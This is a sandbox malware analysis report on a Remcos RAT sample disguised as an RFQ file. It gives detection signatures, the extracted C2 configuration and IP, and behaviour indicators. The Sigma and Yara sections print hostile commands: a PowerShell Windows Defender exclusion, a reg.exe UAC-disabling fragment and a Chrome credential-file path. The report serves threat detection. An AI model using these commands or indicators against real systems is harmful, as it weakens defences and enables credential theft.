Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ-20241230.pif.exe

Overview

General Information

Sample name:RFQ-20241230.pif.exe
Analysis ID:1586923
MD5:a2800b58845d5f108333e9f7f9c388dd
SHA1:1a1ce9b83de9d2e967a539aabeafdab36dbb626a
SHA256:b43ca133d57448c7afb42bffcb1ce756cdad70308d3f49c9c981fac24c55e76f
Tags:exeuser-lowmal3
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ-20241230.pif.exe (PID: 7696 cmdline: "C:\Users\user\Desktop\RFQ-20241230.pif.exe" MD5: A2800B58845D5F108333E9F7F9C388DD)
    • powershell.exe (PID: 7904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8068 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • RFQ-20241230.pif.exe (PID: 7924 cmdline: "C:\Users\user\Desktop\RFQ-20241230.pif.exe" MD5: A2800B58845D5F108333E9F7F9C388DD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["173.211.106.233:2404:1"], "Assigned name": "RemcoHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4WOIVV", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x30f00:$a1: Remcos restarted by watchdog!
        • 0x31478:$a3: %02i:%02i:%02i:%03i
        00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          Click to see the 18 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.RFQ-20241230.pif.exe.42e7f18.4.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            0.2.RFQ-20241230.pif.exe.42e7f18.4.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              0.2.RFQ-20241230.pif.exe.42e7f18.4.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0.2.RFQ-20241230.pif.exe.42e7f18.4.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x69ef8:$a1: Remcos restarted by watchdog!
                • 0x6a470:$a3: %02i:%02i:%02i:%03i
                0.2.RFQ-20241230.pif.exe.42e7f18.4.unpackREMCOS_RAT_variantsunknownunknown
                • 0x64194:$str_a1: C:\Windows\System32\cmd.exe
                • 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x64204:$str_b2: Executing file:
                • 0x6503c:$str_b3: GetDirectListeningPort
                • 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x64b80:$str_b7: \update.vbs
                • 0x6422c:$str_b9: Downloaded file:
                • 0x64218:$str_b10: Downloading file:
                • 0x642bc:$str_b12: Failed to upload file:
                • 0x65004:$str_b13: StartForward
                • 0x65024:$str_b14: StopForward
                • 0x64ad8:$str_b15: fso.DeleteFile "
                • 0x64a6c:$str_b16: On Error Resume Next
                • 0x64b08:$str_b17: fso.DeleteFolder "
                • 0x642ac:$str_b18: Uploaded file:
                • 0x6426c:$str_b19: Unable to delete:
                • 0x64aa0:$str_b20: while fso.FileExists("
                • 0x64749:$str_c0: [Firefox StoredLogins not found]
                Click to see the 34 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ-20241230.pif.exe", ParentImage: C:\Users\user\Desktop\RFQ-20241230.pif.exe, ParentProcessId: 7696, ParentProcessName: RFQ-20241230.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe", ProcessId: 7904, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ-20241230.pif.exe", ParentImage: C:\Users\user\Desktop\RFQ-20241230.pif.exe, ParentProcessId: 7696, ParentProcessName: RFQ-20241230.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe", ProcessId: 7904, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ-20241230.pif.exe", ParentImage: C:\Users\user\Desktop\RFQ-20241230.pif.exe, ParentProcessId: 7696, ParentProcessName: RFQ-20241230.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe", ProcessId: 7904, ProcessName: powershell.exe

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: Registry Key setAuthor: Joe Security: Data: Details: F5 A9 16 B7 D7 DD 52 3C 72 D4 F6 4A D6 84 87 63 46 28 6C 57 0E EA 64 9D 8B 31 95 CA 53 83 B9 35 E3 B8 0C 1A CB 9A AF 37 9F 91 33 7F 30 6C 92 63 1C B2 B7 E4 22 49 0A 18 12 BF 8C 55 14 60 A7 9C A6 6C ED 04 E5 D2 66 CE 9E 5C 81 8E 79 73 27 57 00 8C C2 26 BF BB , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RFQ-20241230.pif.exe, ProcessId: 7924, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-4WOIVV\exepath

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-09T19:03:28.977389+010020365941Malware Command and Control Activity Detected192.168.2.949734173.211.106.2332404TCP
                2025-01-09T19:03:51.431052+010020365941Malware Command and Control Activity Detected192.168.2.949865173.211.106.2332404TCP
                2025-01-09T19:04:13.902031+010020365941Malware Command and Control Activity Detected192.168.2.949978173.211.106.2332404TCP
                2025-01-09T19:04:36.295670+010020365941Malware Command and Control Activity Detected192.168.2.949981173.211.106.2332404TCP
                2025-01-09T19:04:58.703809+010020365941Malware Command and Control Activity Detected192.168.2.949982173.211.106.2332404TCP
                2025-01-09T19:05:21.120704+010020365941Malware Command and Control Activity Detected192.168.2.949983173.211.106.2332404TCP
                2025-01-09T19:05:43.528036+010020365941Malware Command and Control Activity Detected192.168.2.949984173.211.106.2332404TCP
                2025-01-09T19:06:05.950386+010020365941Malware Command and Control Activity Detected192.168.2.949985173.211.106.2332404TCP
                2025-01-09T19:06:28.391569+010020365941Malware Command and Control Activity Detected192.168.2.949986173.211.106.2332404TCP
                2025-01-09T19:06:50.872655+010020365941Malware Command and Control Activity Detected192.168.2.949987173.211.106.2332404TCP
                2025-01-09T19:07:13.376765+010020365941Malware Command and Control Activity Detected192.168.2.949988173.211.106.2332404TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: RFQ-20241230.pif.exeAvira: detected
                Found malware configuration
                Source: 00000005.00000002.3799626177.0000000001737000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["173.211.106.233:2404:1"], "Assigned name": "RemcoHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4WOIVV", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Multi AV Scanner detection for submitted file
                Source: RFQ-20241230.pif.exeReversingLabs: Detection: 73%
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3799626177.0000000001737000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTR
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: RFQ-20241230.pif.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_0043294A
                Source: RFQ-20241230.pif.exe, 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_af7cf6e1-0

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTR

                Privilege Escalation

                barindex
                Contains functionality to bypass UAC (CMSTPLUA)
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00406764 _wcslen,CoGetObject,5_2_00406764
                Source: RFQ-20241230.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: RFQ-20241230.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040B335
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,5_2_0041B43F
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040B53A
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0044D5F9 FindFirstFileExA,5_2_0044D5F9
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,5_2_004089A9
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00406AC2 FindFirstFileW,FindNextFileW,5_2_00406AC2
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,5_2_00407A8C
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00418C79
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,5_2_00408DA7
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_00406F06

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49734 -> 173.211.106.233:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49865 -> 173.211.106.233:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49978 -> 173.211.106.233:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49981 -> 173.211.106.233:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49983 -> 173.211.106.233:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49986 -> 173.211.106.233:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49987 -> 173.211.106.233:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49982 -> 173.211.106.233:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49984 -> 173.211.106.233:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49985 -> 173.211.106.233:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49988 -> 173.211.106.233:2404
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 173.211.106.233
                Source: global trafficTCP traffic: 192.168.2.9:49734 -> 173.211.106.233:2404
                Source: Joe Sandbox ViewASN Name: QUICKPACKETUS QUICKPACKETUS
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: unknownTCP traffic detected without corresponding DNS query: 173.211.106.233
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00426107 recv,5_2_00426107
                Source: RFQ-20241230.pif.exeString found in binary or memory: http://geoplugin.net/json.gp
                Source: RFQ-20241230.pif.exe, 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, RFQ-20241230.pif.exe, 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, RFQ-20241230.pif.exe, 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: RFQ-20241230.pif.exe, 00000000.00000002.1360288843.0000000003061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000005_2_004099E4
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_004159C6
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_004159C6
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_004159C6
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,5_2_00409B10
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
